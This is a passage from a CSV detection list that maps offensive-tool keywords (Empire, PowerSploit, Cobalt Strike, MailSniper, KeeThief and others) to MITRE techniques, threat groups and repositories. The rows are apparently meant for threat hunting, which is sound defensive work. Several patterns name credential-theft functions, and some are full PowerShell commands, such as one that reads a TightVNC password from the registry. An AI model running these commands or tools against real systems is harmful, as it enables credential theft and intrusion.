T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-ExchangeAccessToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Get-ExoPsAccessToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*getExploit.py*","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" +"*getexploitablesystem*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Get-ExploitableSystem*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Get-ExploitableSystem*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-ExploitableUnquotedPath*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-FakeServiceUsers*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" +"*Get-FireFoxHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-FoxDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-FoxDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1151","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getgppgroups *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-GPPInnerFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getgpppassword *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-GPPPassword -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Get-GPPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-GPPPassword*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-GPPPassword.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1124","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-GPPPassword.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Get-HeadersWithPrtCookies*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*GetHijackableDllName*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" +"*Get-ImageNtHeaders*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1103","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-implantworkingdirectory*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-InactiveDomainAdmins*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" +"*Get-InternetExplorerBookmarks*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-InternetExplorerHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ItemProperty -Path HKLM:\Software\TightVNC\Server -Name *Password* | select -ExpandProperty Password*","offensive_tool_keyword","AD exploitation cheat sheet","TightVNC password (convert to Hex then decrypt with e.g.: https://github.com/frizb/PasswordDecrypts)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name *RunAsPPL*","offensive_tool_keyword","AD exploitation cheat sheet","Sometimes LSASS is configured to run as a protected process (PPL). You can query this with PowerShell as follows.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-KeePassConfigTrigger*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" +"*Get-KeePassDatabaseKey*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-KeePassDatabaseKey*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and 